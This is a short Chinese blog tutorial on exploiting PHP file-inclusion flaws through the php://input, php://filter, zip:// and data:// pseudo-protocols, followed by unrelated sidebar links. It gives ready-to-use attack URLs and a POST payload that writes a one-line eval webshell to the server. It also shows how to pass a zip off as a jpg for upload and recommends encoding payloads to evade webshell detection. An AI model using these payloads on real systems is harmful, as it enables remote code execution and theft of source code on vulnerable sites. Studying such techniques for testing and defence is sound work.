当前位置:网站首页>文件包含之伪协议的使用
文件包含之伪协议的使用
2022-08-03 14:51:00 【一青一柠】
文件包含漏洞利用实例
1. php流的input
http://127.0.0.1/include/03/index.php?page=php://input
然后要用post类型提交数据
这里可以这么提交:
<?php
fputs(fopen("shell.php","w"),"<?php @eval(\$_POST["hack"])?>")
?>
这里通过直接写入一个木马文件,来进行攻击。
所以不只是文件上传点可以写入木马,php的input流也可以写入一句话木马。
2. php流的filter协议
?page=php://filter/read=convert.base64-encode/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
通过指定末尾的文件,可以读取经base64编码后的文件源码,之后再base64解码一下就行。
虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。
allow_url_include和allow_url fopen都不做要求,这是非常大的优势。
3. zip压缩流
?page=zip://C:/Users/40454/Desktop/test.jpg%23test.txt
先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传。、
注意,这里必须是绝对路径。
4. data协议
?file=data://text/plain,<?php phpinfo();?>
但在利用时有很多问题。
后面php代码容易被查杀,所以要灵活利用编码等方法,可以借鉴webshell免杀,原理都是一样的。
<?php phpinfo();?>在编成base64的时候出现了+。而浏览器不认识+号。解决思路:
不写后面的 ?> 因为PHP里面其实不需要写后面的 前面的 ;号就已经说明结束了。
如果没有;号就必须写 ?>作为结束。
边栏推荐
猜你喜欢
随机推荐
With 1000 lines of code statistics after the xi 'an housing prices, I have a startling discovery...
PAT乙级-B1016 部分A+B(15)
PAT乙级-B1009 说反话(20)
彻底搞懂云桌面配置及实践踩坑【华为云至简致远】
ffplay视频播放原理分析
Clickhouse Filling the Pit 3: Left Join changed to Right Join, resulting in incorrect statistical results
一个在浏览器中看到的透视Cell实现
Several methods of installing Mysql in Linux
三元表达式实现多个条件的判断
云硬盘EVS详解以及如何用与避坑【华为云至简致远】
技术分享 | 接口自动化测试如何搞定 json 响应断言?
地球自转加快
HDU 1160 FatMouse's Speed(最长递减子序列变形)
PAT乙级-B1015 德才论(25)
选择合适的 DevOps 工具,从理解 DevOps 开始
一文搞懂$_POST和php://input的区别
兆骑科创高层次人才引进平台,创新创业赛事活动路演
基于matlab的遥测信道的基本特性仿真分析
JS每晚24:00更新某方法
Jupyter Notebook 交互式编程 & 低代码拖拽式编程 | 数据科学生态下的理想平台









